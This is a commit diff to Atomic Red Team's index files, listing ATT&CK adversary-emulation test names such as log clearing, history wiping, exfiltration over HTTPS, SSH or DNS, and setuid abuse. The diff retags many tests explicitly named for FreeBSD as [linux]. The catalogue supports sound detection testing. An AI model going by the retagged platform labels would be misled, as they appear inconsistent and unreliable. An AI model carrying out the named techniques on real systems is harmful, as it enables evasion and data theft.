433 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
434 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
435 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
436 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 sh
437 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
438 execution T1053.002 Scheduled Task/Job: At 3 At - Schedule a job freebsd 549863fb-1c91-467e-97fc-1fa32b9f356b sh
439 initial-access T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
440 initial-access T1078.003 Valid Accounts: Local Accounts 9 Create local account (FreeBSD) 95158cc9-8f6d-4889-9531-9be3f7f095e0 sh
441 initial-access T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
442 initial-access T1078.003 Valid Accounts: Local Accounts 11 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
443 initial-access T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
444 initial-access T1078.003 Valid Accounts: Local Accounts 13 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
445 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl freebsd,linux or macos 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
446 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
447 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
449 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
450 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
451 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 8 Python3 http.server 3ea1f938-f80a-4305-9aa8-431bc4867313 sh
452 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 9 Python3 http.server (freebsd) 57a303a2-0bc6-400d-b144-4f3292920a0b sh
+227 -227
View File
@@ -24,25 +24,25 @@
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: chflags - Remove immutable file attribute [freebsd]
- Atomic Test #10: chflags - Remove immutable file attribute [linux]
- Atomic Test #11: Chmod through c script [macos, linux]
- Atomic Test #12: Chmod through c script (freebsd) [freebsd]
- Atomic Test #12: Chmod through c script (freebsd) [linux]
- Atomic Test #13: Chown through c script [macos, linux]
- Atomic Test #14: Chown through c script (freebsd) [freebsd]
- Atomic Test #14: Chown through c script (freebsd) [linux]
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -84,11 +84,11 @@
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Sudo usage (freebsd) [freebsd]
- Atomic Test #2: Sudo usage (freebsd) [linux]
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
@@ -99,7 +99,7 @@
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -118,24 +118,24 @@
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: rm -rf [freebsd]
- Atomic Test #2: rm -rf [linux]
- Atomic Test #3: Delete log files using built-in log utility [macos]
- Atomic Test #4: Truncate system log files via truncate utility [macos]
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [freebsd]
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
- Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [freebsd]
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
- Atomic Test #8: System log file deletion via find utility [macos]
- Atomic Test #9: Overwrite macOS system log via echo utility [macos]
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [freebsd]
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
- Atomic Test #11: Real-time system log clearance/deletion [macos]
- Atomic Test #12: Delete system log files via unlink utility [macos]
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [freebsd]
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
- Atomic Test #14: Delete system log files using shred utility [macos]
- Atomic Test #15: Delete system log files using srm utility [macos]
- Atomic Test #16: Delete system log files using OSAScript [macos]
@@ -183,21 +183,21 @@
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear sh history (rm) [freebsd]
- Atomic Test #2: Clear sh history (rm) [linux]
- Atomic Test #3: Clear Bash history (echo) [linux]
- Atomic Test #4: Clear sh history (echo) [freebsd]
- Atomic Test #4: Clear sh history (echo) [linux]
- Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #6: Clear sh history (cat dev/null) [freebsd]
- Atomic Test #6: Clear sh history (cat dev/null) [linux]
- Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #8: Clear sh history (ln dev/null) [freebsd]
- Atomic Test #8: Clear sh history (ln dev/null) [linux]
- Atomic Test #9: Clear Bash history (truncate) [linux]
- Atomic Test #10: Clear sh history (truncate) [freebsd]
- Atomic Test #10: Clear sh history (truncate) [linux]
- Atomic Test #11: Clear history of a bunch of shells [linux, macos]
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [freebsd]
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [freebsd]
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
- Atomic Test #17: Prevent Powershell History Logging [windows]
- Atomic Test #18: Clear Powershell History by Deleting History File [windows]
- Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
@@ -209,12 +209,12 @@
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [freebsd]
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [freebsd]
- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux]
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux]
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
- [T1562 Impair Defenses](../../T1562/T1562.md)
@@ -256,10 +256,10 @@
- Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
@@ -292,11 +292,11 @@
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start Packet Filter [freebsd]
- Atomic Test #8: Stop/Start Packet Filter [linux]
- Atomic Test #9: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #10: Turn off UFW logging [linux]
- Atomic Test #11: Add and delete UFW firewall rules [linux]
- Atomic Test #12: Add and delete Packet Filter rules [freebsd]
- Atomic Test #12: Add and delete Packet Filter rules [linux]
- Atomic Test #13: Edit UFW firewall user.rules file [linux]
- Atomic Test #14: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #15: Edit UFW firewall sysctl.conf file [linux]
@@ -381,8 +381,8 @@
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
@@ -407,15 +407,15 @@
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd]
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- Atomic Test #7: Make and modify capabilities of a binary [linux]
- Atomic Test #8: Provide the SetUID capability to a file [linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -430,9 +430,9 @@
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [freebsd]
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
- Atomic Test #3: Logging Configuration Changes on Linux Host [linux]
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [freebsd]
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux]
- Atomic Test #5: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
@@ -497,14 +497,14 @@
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Disable history collection (freebsd) [freebsd]
- Atomic Test #2: Disable history collection (freebsd) [linux]
- Atomic Test #3: Mac HISTCONTROL [macos, linux]
- Atomic Test #4: Clear bash history [linux]
- Atomic Test #5: Setting the HISTCONTROL environment variable [linux]
- Atomic Test #6: Setting the HISTFILESIZE environment variable [linux]
- Atomic Test #7: Setting the HISTSIZE environment variable [freebsd]
- Atomic Test #7: Setting the HISTSIZE environment variable [linux]
- Atomic Test #8: Setting the HISTFILE environment variable [linux]
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [freebsd]
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
- Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -539,7 +539,7 @@
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable syslog (freebsd) [freebsd]
- Atomic Test #2: Disable syslog (freebsd) [linux]
- Atomic Test #3: Disable Cb Response [linux]
- Atomic Test #4: Disable SELinux [linux]
- Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
@@ -580,7 +580,7 @@
- Atomic Test #40: Suspend History [linux]
- Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
- Atomic Test #42: Clear Pagging Cache [linux]
- Atomic Test #43: Disable Memory Swap [freebsd, linux]
- Atomic Test #43: Disable Memory Swap [linux]
- Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
- Atomic Test #45: AMSI Bypass - Override AMSI via COM [windows]
- Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws]
@@ -596,7 +596,7 @@
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Decode base64 Data into Script [freebsd]
- Atomic Test #2: Decode base64 Data into Script [linux]
- Atomic Test #3: Execute base64-encoded PowerShell [windows]
- Atomic Test #4: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #5: Execution from Compressed File [windows]
@@ -625,7 +625,7 @@
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux]
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
@@ -646,7 +646,7 @@
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on FreeBSD [freebsd]
- Atomic Test #2: Install root CA on FreeBSD [linux]
- Atomic Test #3: Install root CA on Debian/Ubuntu [linux]
- Atomic Test #4: Install root CA on macOS [macos]
- Atomic Test #5: Install root CA on Windows [windows]
@@ -655,9 +655,9 @@
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- Atomic Test #3: C compile [freebsd, linux, macos]
- Atomic Test #4: CC compile [freebsd, linux, macos]
- Atomic Test #5: Go compile [freebsd, linux, macos]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
@@ -697,15 +697,15 @@
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Filesystem - FreeBSD [freebsd]
- Atomic Test #9: Delete Filesystem - FreeBSD [linux]
- Atomic Test #10: Delete Prefetch File [windows]
- Atomic Test #11: Delete TeamViewer Log Files [windows]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -724,7 +724,7 @@
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- Atomic Test #3: Space After Filename (FreeBSD) [freebsd]
- Atomic Test #3: Space After Filename (FreeBSD) [linux]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
@@ -743,7 +743,7 @@
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
@@ -787,11 +787,11 @@
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
- Atomic Test #13: Login as nobody (freebsd) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -855,11 +855,11 @@
- Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Sudo usage (freebsd) [freebsd]
- Atomic Test #2: Sudo usage (freebsd) [linux]
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -881,9 +881,9 @@
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
@@ -938,9 +938,9 @@
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap EXIT (freebsd) [freebsd]
- Atomic Test #2: Trap EXIT (freebsd) [linux]
- Atomic Test #3: Trap SIGINT [macos, linux]
- Atomic Test #4: Trap SIGINT (freebsd) [freebsd]
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
@@ -954,15 +954,15 @@
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd]
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- Atomic Test #7: Make and modify capabilities of a binary [linux]
- Atomic Test #8: Provide the SetUID capability to a file [linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
